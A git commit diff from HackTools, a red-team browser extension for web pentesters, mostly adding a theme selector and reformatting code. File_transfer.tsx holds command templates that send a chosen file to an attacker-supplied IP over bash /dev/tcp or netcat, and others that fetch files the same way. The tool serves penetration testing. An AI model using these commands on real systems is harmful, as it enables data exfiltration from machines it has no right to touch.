RobbyV2/HackTools
1
0
Fork 0
mirror of https://github.com/LasCC/HackTools.git synced 2025-09-04 13:59:47 +00:00
Code Issues Packages Projects Releases Wiki Activity

NEW - Dynamic theme selection

Browse Source
This commit is contained in:
Ludovic COULON
2021-11-21 16:50:14 +01:00
parent d2a2376267
commit 8aa7e9ba07
28 changed files with 2774 additions and 2587 deletions
Download Patch File Download Diff File Expand all files Collapse all files

69
package.json
View File

@@ -13,60 +13,61 @@
"author": "Ludovic COULON & Riadh BOUCHAHOUA",
"license": "MIT",
"devDependencies": {
"@babel/cli": "^7.14.8",
"@babel/core": "^7.15.0",
"@babel/cli": "^7.16.0",
"@babel/core": "^7.16.0",
"@babel/helper-call-delegate": "^7.12.13",
"@babel/plugin-proposal-class-properties": "^7.14.5",
"@babel/preset-env": "^7.15.0",
"@babel/preset-react": "^7.14.5",
"@babel/preset-typescript": "^7.9.0",
"@babel/plugin-proposal-class-properties": "^7.16.0",
"@babel/preset-env": "^7.16.4",
"@babel/preset-react": "^7.16.0",
"@babel/preset-typescript": "^7.15.0",
"@pmmmwh/react-refresh-webpack-plugin": "^0.5.2",
"@types/antd": "^1.0.0",
"@types/crypto-js": "^4.0.2",
"@types/pretty": "^2.0.0",
"@types/react-query": "^1.2.9",
"@types/react-syntax-highlighter": "^13.5.2",
"@types/use-persisted-state": "^0.3.0",
"babel-loader": "^8.2.2",
"clean-webpack-plugin": "^4.0.0-alpha.0",
"copy-webpack-plugin": "^9.0.1",
"css-loader": "^6.2.0",
"babel-loader": "^8.2.3",
"clean-webpack-plugin": "^4.0.0",
"copy-webpack-plugin": "^10.0.0",
"css-loader": "^6.5.1",
"file-loader": "^6.2.0",
"html-webpack-plugin": "^5.3.2",
"html-webpack-plugin": "^5.5.0",
"react-hot-loader": "^4.13.0",
"style-loader": "^3.2.1",
"typescript": "^4.3.5",
"webpack": "^5.50.0",
"webpack-cli": "^4.8.0",
"webpack-dev-server": "^4.0.0"
"react-refresh": "^0.11.0",
"style-loader": "^3.3.1",
"typescript": "^4.4.3",
"webpack": "^5.64.1",
"webpack-cli": "^4.9.1",
"webpack-dev-server": "^4.5.0"
},
"browserslist": [
">0.2%",
"not dead",
"not op_mini all"
],
"browserslist": [ ">0.2%", "not dead", "not op_mini all" ],
"dependencies": {
"@ant-design/icons": "4.6.2",
"@ant-design/icons": "4.7.0",
"@hot-loader/react-dom": "^17.0.1",
"@types/chrome": "^0.0.154",
"@types/jest": "^27.0.1",
"@types/node": "^16.6.1",
"@types/react": "^17.0.18",
"@types/chrome": "^0.0.164",
"@types/jest": "^27.0.3",
"@types/node": "^16.11.9",
"@types/react": "^17.0.27",
"@types/react-dom": "^17.0.9",
"antd": "4.16.12",
"antd": "4.16.13",
"antd-mask-input": "0.1.15",
"axios": "^0.21.1",
"axios": "^0.24.0",
"crypto-js": "^4.0.0",
"escape-quotes": "^1.0.2",
"less": "^4.1.2",
"less-loader": "^10.2.0",
"pretty": "^2.0.0",
"rc-queue-anim": "^2.0.0",
"react": "^17.0.2",
"react-chrome-extension-router": "^1.2.0",
"react": "latest",
"react-chrome-extension-router": "^1.3.1",
"react-clipboard.js": "2.0.16",
"react-dom": "^17.0.2",
"react-query": "^3.19.6",
"react-syntax-highlighter": "^15.4.3",
"react-dom": "latest",
"react-query": "^3.33.1",
"react-refresh-typescript": "^2.0.2",
"react-syntax-highlighter": "^15.4.5",
"sm3": "^1.0.3",
"ts-loader": "^9.2.5",
"ts-loader": "^9.2.6",
"use-persisted-state": "^0.3.3"
}
}

28
src/App.tsx
View File

@@ -10,21 +10,21 @@ import './assets/css/style.css';
const queryClient = new QueryClient();
const App = () => {
return (
<div>
<ReverseShell />
</div>
);
return (
<div>
<ReverseShell />
</div>
);
};
ReactDOM.render(
<QueryClientProvider client={queryClient}>
<LayoutApp>
<Router>
<App />
</Router>
<BackTop />
</LayoutApp>
</QueryClientProvider>,
document.getElementById('app')
<QueryClientProvider client={queryClient}>
<LayoutApp>
<Router>
<App />
</Router>
<BackTop />
</LayoutApp>
</QueryClientProvider>,
document.getElementById( 'app' )
);

8
src/assets/css/style.css
View File

@@ -1,5 +1,3 @@
@import '~antd/dist/antd.dark.min.css';
.logo {
height: 32px;
margin: 16px;
@@ -26,8 +24,11 @@
}
}
.ant-badge {
color: inherit !important;
}
.site-layout .site-layout-background {
background: #0f0f0f !important;
border-radius: 10px;
}
.ant-menu-inline .ant-menu-item:not(:last-child),
@@ -206,5 +207,4 @@ h5.ant-typography,
body {
min-width: 750px;
min-height: auto;
background-color: black;
}

410
src/components/LayoutApp.tsx
View File

@@ -1,5 +1,5 @@
import React, { useEffect } from 'react';
import { Layout, Menu, Typography, Button, Badge } from 'antd';
import React, { useCallback, useEffect, useState } from 'react';
import { Layout, Menu, Typography, Button, Badge, Select, } from 'antd';
import { CopyrightCircleOutlined, FullscreenOutlined, ArrowsAltOutlined } from '@ant-design/icons';
import { createFromIconfontCN } from '@ant-design/icons';
import { goTo } from 'react-chrome-extension-router';
@@ -7,7 +7,6 @@ import ReverseShell from './linux/ReverseShell';
import PhpReverseShell from './web/PhpReverseShell';
import TtySpawnShell from './linux/TtySpawnShell';
import Base64Encode from './encoding/Base64Encode';
import HexEncode from './encoding/HexEncode';
import Hashing from './encoding/Hashing';
import LinuxCommands from './linux/LinuxCommands';
import PowershellCommands from './linux/PowershellCommands';
@@ -20,206 +19,233 @@ import FileTransfer from './file_transfer/File_transfer';
import PersistedState from 'use-persisted-state';
import MSFBuilder from './linux/MSFBuilder';
import HTTPUtils from './http_utils/HTTP-Utils';
import DynamicTheme from '../theming';
import { themes } from '../themes';
const { Paragraph } = Typography;
const { Sider, Content, Footer } = Layout;
const IconFont = createFromIconfontCN({
scriptUrl: [ './iconfont.js' ]
});
const IconFont = createFromIconfontCN( {
scriptUrl: [ './iconfont.js' ]
} );
export default function LayoutApp(props: {
children: boolean | React.ReactChild | React.ReactFragment | React.ReactPortal | null | undefined;
}) {
interface IRouterComponent {
key: string;
icon: JSX.Element;
name: string;
componentRoute: React.FunctionComponent;
}
const defaultTheme = themes[ 0 ];
const options = themes.map( ( theme ) => ( {
label: theme.displayName,
value: theme.id
} ) );
const Tabs: Array<IRouterComponent> = [
{
key: '1',
icon: <IconFont type='icon-gnubash' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Reverse Shell',
componentRoute: ReverseShell
},
{
key: '2',
icon: <IconFont type='icon-php' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'PHP Reverse Shell',
componentRoute: PhpReverseShell
},
{
key: '3',
icon: <IconFont type='icon-lvzhou_yuanchengTelnet' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'TTY Spawn Shell',
componentRoute: TtySpawnShell
},
{
key: '4',
icon: <IconFont type='icon-linux' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Useful Linux commands',
componentRoute: LinuxCommands
},
{
key: '5',
icon: <IconFont type='icon-powershell' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'PowerShell Commands',
componentRoute: PowershellCommands
},
{
key: '6',
icon: <IconFont type='icon-transfer' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Transfer Methods',
componentRoute: FileTransfer
},
{
key: '7',
icon: <IconFont type='icon-l-file' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'LFI',
componentRoute: LFI
},
{
key: '8',
icon: <IconFont type='icon-js' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'XSS',
componentRoute: XSS
},
{
key: '9',
icon: <IconFont type='icon-sql' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'SQL Injection',
componentRoute: SQLi
},
{
key: '10',
icon: <IconFont type='icon-jiemaleixing' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Base64 Encoder / Decoder',
componentRoute: Base64Encode
},
{
key: '11',
icon: <IconFont type='icon-hash' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Hashing',
componentRoute: Hashing
},
{
key: '12',
icon: <IconFont type='icon-Cloud' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Feed RSS',
componentRoute: FeedRSS
},
{
key: '13',
icon: (
<Badge dot size='default' style={{ transform: `translate(3px, 5px)` }}>
<IconFont type='icon-http' style={{ fontSize: '1.5em', marginTop: 3 }} />
</Badge>
),
name: 'HTTP Repeater',
componentRoute: HTTPUtils
},
{
key: '14',
icon: (
<Badge dot size='default' style={{ transform: `translate(3px, 5px)` }}>
<IconFont type='icon-shield' style={{ fontSize: '1.5em', marginTop: 3 }} />
</Badge>
),
name: 'MSF Builder',
componentRoute: MSFBuilder
},
{
key: '15',
icon: <IconFont type='icon-about' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'About us',
componentRoute: AboutUs
}
];
export default function LayoutApp ( props: {
children: boolean | React.ReactChild | React.ReactFragment | React.ReactPortal | null | undefined;
} ) {
const MenuItemsLists = Tabs.map((item) => (
<Menu.Item style={{ overflow: 'hidden' }} key={item.key} icon={item.icon} onClick={() => navigate(item)}>
{item.name}
</Menu.Item>
));
const useDefaultTheme = PersistedState( 'default_colored_theme' );
const [ themeId, setThemeId ] = useDefaultTheme( defaultTheme.id );
const selectThemeId = useCallback(
( option ) => setThemeId( option as string ),
[]
);
const useMenuIndex = PersistedState('tab_index_cache');
const [ index, setIndex ] = useMenuIndex('1');
interface IRouterComponent {
key: string;
icon: JSX.Element;
name: string;
componentRoute: React.FunctionComponent;
}
const navigate = ({ componentRoute, key }: { componentRoute: React.FunctionComponent; key: string }) => {
goTo(componentRoute);
setIndex(key);
};
const Tabs: Array<IRouterComponent> = [
{
key: '1',
icon: <IconFont type='icon-gnubash' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Reverse Shell',
componentRoute: ReverseShell
},
{
key: '2',
icon: <IconFont type='icon-php' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'PHP Reverse Shell',
componentRoute: PhpReverseShell
},
{
key: '3',
icon: <IconFont type='icon-lvzhou_yuanchengTelnet' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'TTY Spawn Shell',
componentRoute: TtySpawnShell
},
{
key: '4',
icon: <IconFont type='icon-linux' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Useful Linux commands',
componentRoute: LinuxCommands
},
{
key: '5',
icon: (
<Badge dot size='default' style={{ transform: `translate(3px, 5px)` }}>
<IconFont type='icon-powershell' style={{ fontSize: '1.5em', marginTop: 3 }} />
</Badge>
),
name: 'PowerShell Commands',
componentRoute: PowershellCommands
},
{
key: '6',
icon: <IconFont type='icon-transfer' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Transfer Methods',
componentRoute: FileTransfer
},
{
key: '7',
icon: <IconFont type='icon-l-file' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'LFI',
componentRoute: LFI
},
{
key: '8',
icon: <IconFont type='icon-js' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'XSS',
componentRoute: XSS
},
{
key: '9',
icon: <IconFont type='icon-sql' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'SQL Injection',
componentRoute: SQLi
},
{
key: '10',
icon: <IconFont type='icon-jiemaleixing' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Base64 Encoder / Decoder',
componentRoute: Base64Encode
},
{
key: '11',
icon: <IconFont type='icon-hash' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Hashing',
componentRoute: Hashing
},
{
key: '12',
icon: <IconFont type='icon-Cloud' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'Feed RSS',
componentRoute: FeedRSS
},
/* {
key: '13',
icon: (
<Badge dot size='default' style={{ transform: `translate(3px, 5px)` }}>
<IconFont type='icon-http' style={{ fontSize: '1.5em', marginTop: 3 }} />
</Badge>
),
name: 'HTTP Repeater',
componentRoute: HTTPUtils
}, */
{
key: '13',
icon: (
<Badge dot size='default' style={{ transform: `translate(3px, 5px)` }}>
<IconFont type='icon-shield' style={{ fontSize: '1.5em', marginTop: 3 }} />
</Badge>
),
name: 'MSF Builder',
componentRoute: MSFBuilder
},
{
key: '14',
icon: <IconFont type='icon-about' style={{ fontSize: '1.5em', marginTop: 3 }} />,
name: 'About us',
componentRoute: AboutUs
}
];
const windowMode = () => {
const width = 1100;
const height = 800;
const MenuItemsLists = Tabs.map( ( item ) => (
<Menu.Item style={{ overflow: 'hidden' }} key={item.key} icon={item.icon} onClick={() => navigate( item )}>
{item.name}
</Menu.Item>
) );
chrome.windows.create({
url: chrome.extension.getURL('index.html'),
width: width,
height: height,
type: 'popup'
});
};
const useMenuIndex = PersistedState( 'tab_index_cache' );
const [ index, setIndex ] = useMenuIndex( '1' );
useEffect(() => {
const currentComponent = Tabs.filter((obj) => obj.key === index)[0].componentRoute;
goTo(currentComponent);
}, []);
const navigate = ( { componentRoute, key }: { componentRoute: React.FunctionComponent; key: string } ) => {
goTo( componentRoute );
setIndex( key );
};
const target = window.location.href;
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsed={true}
style={{
overflow: 'auto',
height: '100vh',
position: 'fixed',
left: 0
}}
>
<div className='logo'>
<svg xmlns='http://www.w3.org/2000/svg' width='45' height='35' viewBox='0 0 134.624 80.584'>
<g transform='translate(-6.457 -23.8)'>
<path
d='M138.715,62.377c-9.043-1.871-15.592.78-21.673,4.989l-5.616-26.958-2.18-10.463a1.432,1.432,0,0,0-.624-.936c-.312-.156-6.86-4.21-32.431-4.21s-34.458,4.678-34.77,4.834c-.468.312-.78.624-.78,1.091L36.9,57.543c-4.678,0-19.022.624-26.039,9.2C7.119,71.264,6.651,78.125,9.3,84.829c4.054,9.979,14.033,16.839,26.506,18.087a80.594,80.594,0,0,0,8.42.468c21.985,0,40.071-8.887,52.389-16.06,1.559-.468,11.538-3.274,24.635-8.42,14.812-5.769,18.554-14.033,18.71-14.5a2.163,2.163,0,0,0,0-1.4C139.495,62.689,139.183,62.377,138.715,62.377ZM43.448,32.128c2.495-1.091,11.694-4.21,32.743-4.21,20.581,0,28.377,2.651,30.248,3.43L111.585,56.3a165.118,165.118,0,0,1-40.851,8.887C51.088,66.9,41.733,63,39.238,61.6ZM95.058,84.517c-13.409,7.8-33.991,17.931-59.094,15.436-11.382-1.247-20.27-7.328-24.012-16.216-2.183-5.613-1.871-11.382,1.091-14.968,5.925-7.328,18.554-8.108,23.232-8.108L34.249,74.694a1.367,1.367,0,0,0,.78,1.559c9.979,6.081,21.049,8.264,31.5,8.264,16.216,0,31.34-5.145,40.7-9.043A85,85,0,0,1,95.058,84.517ZM120,75.942C114.236,78.125,109.091,80,104.881,81.4c2.183-1.715,4.054-3.43,6.081-5.145,7.172-6.237,13.1-11.382,21.829-11.382a19.881,19.881,0,0,1,2.962.156C134.038,67.522,129.516,72.356,120,75.942Z'
transform='translate(0 0)'
fill='#F0F2F5'
stroke='#F0F2F5'
strokeWidth='2'
/>
</g>
</svg>
</div>
const windowMode = () => {
const width = 1100;
const height = 800;
<Menu theme='dark' defaultSelectedKeys={[ index ]} mode='inline'>
{MenuItemsLists}
</Menu>
</Sider>
<Layout className='site-layout' style={{ marginLeft: 80 }}>
<Content style={{ margin: '24px 16px 0', overflow: 'initial' }}>
<div className='site-layout-background' style={{ padding: 24, minHeight: 360 }}>
{props.children}
</div>
</Content>
<Footer style={{ textAlign: 'center' }}>
<CopyrightCircleOutlined /> Hack Tools - The all in one Red team browser extension for web
pentesters
<Paragraph style={{ textAlign: 'center' }}>Ludovic COULON - Riadh BOUCHAHOUA</Paragraph>
<pre style={{ textAlign: 'center' }}>HackTools Version - 0.4.0</pre>
<Button icon={<FullscreenOutlined style={{ margin: 5 }} />} type='link'>
<a href={target} rel='noreferrer noopener' target='_blank'>
Fullscreen mode
</a>
</Button>
<Button icon={<ArrowsAltOutlined style={{ margin: 5 }} />} onClick={() => windowMode()} type='link'>
Pop-up mode
</Button>
</Footer>
</Layout>
</Layout>
);
chrome.windows.create( {
url: chrome.extension.getURL( 'index.html' ),
width: width,
height: height,
type: 'popup'
} );
};
useEffect( () => {
const currentComponent = Tabs.filter( ( obj ) => obj.key === index )[ 0 ].componentRoute;
goTo( currentComponent );
}, [] );
const target = window.location.href;
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsed={true}
style={{
overflow: 'auto',
height: '100vh',
position: 'fixed',
left: 0
}}
>
<div className='logo'>
<svg xmlns='http://www.w3.org/2000/svg' width='45' height='35' viewBox='0 0 134.624 80.584'>
<g transform='translate(-6.457 -23.8)'>
<path
d='M138.715,62.377c-9.043-1.871-15.592.78-21.673,4.989l-5.616-26.958-2.18-10.463a1.432,1.432,0,0,0-.624-.936c-.312-.156-6.86-4.21-32.431-4.21s-34.458,4.678-34.77,4.834c-.468.312-.78.624-.78,1.091L36.9,57.543c-4.678,0-19.022.624-26.039,9.2C7.119,71.264,6.651,78.125,9.3,84.829c4.054,9.979,14.033,16.839,26.506,18.087a80.594,80.594,0,0,0,8.42.468c21.985,0,40.071-8.887,52.389-16.06,1.559-.468,11.538-3.274,24.635-8.42,14.812-5.769,18.554-14.033,18.71-14.5a2.163,2.163,0,0,0,0-1.4C139.495,62.689,139.183,62.377,138.715,62.377ZM43.448,32.128c2.495-1.091,11.694-4.21,32.743-4.21,20.581,0,28.377,2.651,30.248,3.43L111.585,56.3a165.118,165.118,0,0,1-40.851,8.887C51.088,66.9,41.733,63,39.238,61.6ZM95.058,84.517c-13.409,7.8-33.991,17.931-59.094,15.436-11.382-1.247-20.27-7.328-24.012-16.216-2.183-5.613-1.871-11.382,1.091-14.968,5.925-7.328,18.554-8.108,23.232-8.108L34.249,74.694a1.367,1.367,0,0,0,.78,1.559c9.979,6.081,21.049,8.264,31.5,8.264,16.216,0,31.34-5.145,40.7-9.043A85,85,0,0,1,95.058,84.517ZM120,75.942C114.236,78.125,109.091,80,104.881,81.4c2.183-1.715,4.054-3.43,6.081-5.145,7.172-6.237,13.1-11.382,21.829-11.382a19.881,19.881,0,0,1,2.962.156C134.038,67.522,129.516,72.356,120,75.942Z'
transform='translate(0 0)'
fill='#F0F2F5'
stroke='#F0F2F5'
strokeWidth='2'
/>
</g>
</svg>
</div>
<Menu theme='dark' defaultSelectedKeys={[ index ]} mode='inline'>
{MenuItemsLists}
</Menu>
</Sider>
<Layout className='site-layout' style={{ marginLeft: 80 }}>
<Content style={{ margin: '24px 16px 0', overflow: 'initial' }}>
<div className='site-layout-background' style={{ padding: 24, minHeight: 360 }}>
{props.children}
</div>
</Content>
<Footer style={{ textAlign: 'center' }}>
<CopyrightCircleOutlined /> Hack Tools - The all in one Red team browser extension for web
pentesters
<Paragraph style={{ textAlign: 'center' }}>Ludovic COULON - Riadh BOUCHAHOUA</Paragraph>
<pre style={{ textAlign: 'center' }}>HackTools Version - 0.4.0</pre>
<Button icon={<FullscreenOutlined style={{ margin: 5 }} />} type='link'>
<a href={target} rel='noreferrer noopener' target='_blank'>
Fullscreen mode
</a>
</Button>
<DynamicTheme themes={themes} value={themeId} />
<Select
value={themeId}
style={{ minWidth: 200 }}
options={options}
onSelect={selectThemeId}
/>
<Button icon={<ArrowsAltOutlined style={{ margin: 5 }} />} onClick={() => windowMode()} type='link'>
Pop-up mode
</Button>
</Footer>
</Layout>
</Layout>
);
}

326
src/components/encoding/Base64Encode.tsx
View File

@@ -6,179 +6,179 @@ import QueueAnim from 'rc-queue-anim';
import escape_quotes from 'escape-quotes';
const { Title, Paragraph } = Typography;
const IconFont = createFromIconfontCN({
scriptUrl: [ './iconfont.js' ]
});
const IconFont = createFromIconfontCN( {
scriptUrl: [ './iconfont.js' ]
} );
function toHex(str: string) {
var result = '';
for (var i = 0; i < str.length; i++) {
result += str.charCodeAt(i).toString(16).toUpperCase();
}
return result;
function toHex ( str: string ) {
var result = '';
for ( var i = 0; i < str.length; i++ ) {
result += str.charCodeAt( i ).toString( 16 ).toUpperCase();
}
return result;
}
function hex2a(hex: string) {
var str = '';
for (var i = 0; i < hex.length; i += 2) str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
return str;
function hex2a ( hex: string ) {
var str = '';
for ( var i = 0; i < hex.length; i += 2 ) str += String.fromCharCode( parseInt( hex.substr( i, 2 ), 16 ) );
return str;
}
const Base64Encode = () => {
const [ input, setInput ] = useState('');
const [ output, setOutput ] = useState('');
const { TextArea } = Input;
const successBase64Copy = () => {
message.success('Your payload has been copied successfully !');
};
const handleChange = (_name: string) => (event: { target: { value: React.SetStateAction<string> } }) => {
setInput(event.target.value);
};
const handleClick = (type: string) => {
if (type === 'encode' && encMode === 'base64') {
setOutput(btoa(input));
} else if (type === 'decode' && encMode === 'base64') {
try {
setOutput(atob(input));
} catch (ex) {
setOutput('Unable to decode properly : Incorrect base64 ');
message.error('Incorrect Base64 please try something else');
}
} else if (type === 'decode' && encMode === 'uri') {
try {
setOutput(decodeURI(input));
} catch (ex) {
setOutput('Unable to decode properly : Incorrect base64 ');
message.error('Incorrect Base64 please try something else');
}
} else if (type === 'encode' && encMode === 'uri') {
try {
setOutput(encodeURI(input));
} catch (error) {
setOutput('Unable to decode properly : Incorrect URI ');
message.error('Incorrect format please try something else');
}
} else if (type === 'decode' && encMode === 'hex') {
try {
setOutput(hex2a(input));
} catch (ex) {
setOutput('Unable to decode properly : Incorrect hexadecimal ');
message.error('Incorrect Hex please try something else');
}
} else if (type === 'encode' && encMode === 'hex') {
try {
setOutput(toHex(input));
} catch (error) {
setOutput('Unable to decode properly : Incorrect hexadecimal ');
message.error('Incorrect Hex please try something else');
}
}
return;
};
const [ encMode, setEncmode ] = useState('base64');
const handleQuoteEscaper = () => {
setOutput(escape_quotes(input));
};
const [ input, setInput ] = useState( '' );
const [ output, setOutput ] = useState( '' );
const { TextArea } = Input;
const successBase64Copy = () => {
message.success( 'Your payload has been copied successfully !' );
};
const handleChange = ( _name: string ) => ( event: { target: { value: React.SetStateAction<string> } } ) => {
setInput( event.target.value );
};
const handleClick = ( type: string ) => {
if ( type === 'encode' && encMode === 'base64' ) {
setOutput( btoa( input ) );
} else if ( type === 'decode' && encMode === 'base64' ) {
try {
setOutput( atob( input ) );
} catch ( ex ) {
setOutput( 'Unable to decode properly : Incorrect base64 ' );
message.error( 'Incorrect Base64 please try something else' );
}
} else if ( type === 'decode' && encMode === 'uri' ) {
try {
setOutput( decodeURI( input ) );
} catch ( ex ) {
setOutput( 'Unable to decode properly : Incorrect base64 ' );
message.error( 'Incorrect Base64 please try something else' );
}
} else if ( type === 'encode' && encMode === 'uri' ) {
try {
setOutput( encodeURI( input ) );
} catch ( error ) {
setOutput( 'Unable to decode properly : Incorrect URI ' );
message.error( 'Incorrect format please try something else' );
}
} else if ( type === 'decode' && encMode === 'hex' ) {
try {
setOutput( hex2a( input ) );
} catch ( ex ) {
setOutput( 'Unable to decode properly : Incorrect hexadecimal ' );
message.error( 'Incorrect Hex please try something else' );
}
} else if ( type === 'encode' && encMode === 'hex' ) {
try {
setOutput( toHex( input ) );
} catch ( error ) {
setOutput( 'Unable to decode properly : Incorrect hexadecimal ' );
message.error( 'Incorrect Hex please try something else' );
}
}
return;
};
const [ encMode, setEncmode ] = useState( 'base64' );
const handleQuoteEscaper = () => {
setOutput( escape_quotes( input ) );
};
const handleEncModeList = (type: { key: React.SetStateAction<string | any> }) => {
setEncmode(type.key.toString());
};
const handleEncModeList = ( type: { key: React.SetStateAction<string | any> } ) => {
setEncmode( type.key.toString() );
};
const menu = (
<Menu onClick={handleEncModeList}>
<Menu.Item key='base64'>Base64</Menu.Item>
<Menu.Divider />
<Menu.Item key='uri'>URI</Menu.Item>
<Menu.Divider />
<Menu.Item key='hex'>Hexadecimal</Menu.Item>
</Menu>
);
const menu = (
<Menu onClick={handleEncModeList}>
<Menu.Item key='base64'>Base64</Menu.Item>
<Menu.Divider />
<Menu.Item key='uri'>URI</Menu.Item>
<Menu.Divider />
<Menu.Item key='hex'>Hexadecimal</Menu.Item>
</Menu>
);
return (
<QueueAnim delay={300} duration={1500}>
<div style={{ margin: 15 }}>
<Title level={2} style={{ fontWeight: 'bold' }}>
Encoder / Decoder
</Title>
<Paragraph>
In computer science, Base64 is a group of binary-to-text encoding schemes that represent binary data
in an ASCII string format by translating it into a radix-64 representation.
</Paragraph>
</div>
<Divider dashed />
<div
key='a'
style={{
marginTop: 15,
marginLeft: 15
}}
>
<TextArea
rows={4}
value={input}
onChange={handleChange('input')}
placeholder='Some Base64 or ASCII Text to Encode / Decode / Quote escape...'
/>
return (
<QueueAnim delay={300} duration={1500}>
<div style={{ margin: 15 }}>
<Title level={2} style={{ fontWeight: 'bold' }}>
Encoder / Decoder
</Title>
<Paragraph>
In computer science, Base64 is a group of binary-to-text encoding schemes that represent binary data
in an ASCII string format by translating it into a radix-64 representation.
</Paragraph>
</div>
<Divider dashed />
<div
key='a'
style={{
marginTop: 15,
marginLeft: 15
}}
>
<TextArea
rows={4}
value={input}
onChange={handleChange( 'input' )}
placeholder='Some Base64 or ASCII Text to Encode / Decode / Quote escape...'
/>
<Dropdown overlay={menu}>
<a className='ant-dropdown-link'>
{encMode} <DownOutlined style={{ padding: 10 }} />
</a>
</Dropdown>
<Dropdown overlay={menu}>
<a className='ant-dropdown-link'>
{encMode} <DownOutlined style={{ padding: 10 }} />
</a>
</Dropdown>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => handleClick('encode')}
>
<IconFont type='icon-lock' />
Encode
</Button>
<Button
type='dashed'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={() => handleClick('decode')}
>
<IconFont type='icon-lock-open' />
Decode
</Button>
<Button
type='text'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 8 }}
onClick={() => handleQuoteEscaper()}
>
<IconFont type='icon-lock-open' />
Quote escape
</Button>
</div>
<div
key='b'
style={{
marginTop: 15,
marginLeft: 15
}}
>
<TextArea
rows={4}
value={output}
style={{ cursor: 'auto', marginTop: 15, color: '#777' }}
placeholder='The results will appear here'
/>
<Clipboard component='a' data-clipboard-text={output}>
<Button type='primary' style={{ marginBottom: 10, marginTop: 15 }} onClick={successBase64Copy}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
<Button
type='link'
danger
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={() => setOutput('')}
>
<ClearOutlined /> Clear
</Button>
</div>
</QueueAnim>
);
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => handleClick( 'encode' )}
>
<IconFont type='icon-lock' />
Encode
</Button>
<Button
type='dashed'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={() => handleClick( 'decode' )}
>
<IconFont type='icon-lock-open' />
Decode
</Button>
<Button
type='text'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 8 }}
onClick={() => handleQuoteEscaper()}
>
<IconFont type='icon-lock-open' />
Quote escape
</Button>
</div>
<div
key='b'
style={{
marginTop: 15,
marginLeft: 15
}}
>
<TextArea
rows={4}
value={output}
style={{ cursor: 'auto', marginTop: 15, color: '#777' }}
placeholder='The results will appear here'
/>
<Clipboard component='a' data-clipboard-text={output}>
<Button type='primary' style={{ marginBottom: 10, marginTop: 15 }} onClick={successBase64Copy}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
<Button
type='link'
danger
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={() => setOutput( '' )}
>
<ClearOutlined /> Clear
</Button>
</div>
</QueueAnim>
);
};
export default Base64Encode;

320
src/components/file_transfer/File_transfer.tsx
View File

@@ -5,169 +5,169 @@ import { WifiOutlined, createFromIconfontCN, FolderOutlined } from '@ant-design/
import QueueAnim from 'rc-queue-anim';
const { Title, Paragraph, Text } = Typography;
const IconFont = createFromIconfontCN({
scriptUrl: [ './iconfont.js' ]
});
const IconFont = createFromIconfontCN( {
scriptUrl: [ './iconfont.js' ]
} );
export default function FileTransfer() {
const useIPv4State = PersistedState('ipv4_tcp_cache');
export default function FileTransfer () {
const useIPv4State = PersistedState( 'ipv4_tcp_cache' );
const [ values, setValues ] = useIPv4State({
ip: '',
port: '',
file_name: ''
});
const handleChange = (name: string) => (event: { target: { value: string } }) => {
setValues({ ...values, [name]: event.target.value });
};
const bash_transfer = `
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<${values.file_name})" > /dev/tcp/${values.ip}/${values.port}'
const [ values, setValues ] = useIPv4State( {
ip: '',
port: '',
file_name: ''
} );
const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {
setValues( { ...values, [ name ]: event.target.value } );
};
const bash_transfer = `
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<${ values.file_name })" > /dev/tcp/${ values.ip }/${ values.port }'
`;
const bash_tcp_transfer = `
bash -c 'cat ${values.file_name} > /dev/tcp/${values.ip}/${values.port}'
const bash_tcp_transfer = `
bash -c 'cat ${ values.file_name } > /dev/tcp/${ values.ip }/${ values.port }'
`;
const bash_download = `bash -c 'cat < /dev/tcp/${values.ip}/${values.port} > ${values.file_name}'`;
const netcat_transfer = `nc ${values.ip} ${values.port} < ${values.file_name}`;
const python_server = `python3 -m http.server ${values.port}`;
const python2_server = `python -m SimpleHTTPServer ${values.port}`;
const scp = `scp ${values.file_name} username@${values.ip || 'IP'}:~/destination ${values.port &&
'-P ' + values.port}`;
const scp_dl = `scp user@${values.ip || 'IP'}:~/path_to_file file_saved ${values.port && '-P ' + values.port}`;
const bash_download = `bash -c 'cat < /dev/tcp/${ values.ip }/${ values.port } > ${ values.file_name }'`;
const netcat_transfer = `nc ${ values.ip } ${ values.port } < ${ values.file_name }`;
const python_server = `python3 -m http.server ${ values.port }`;
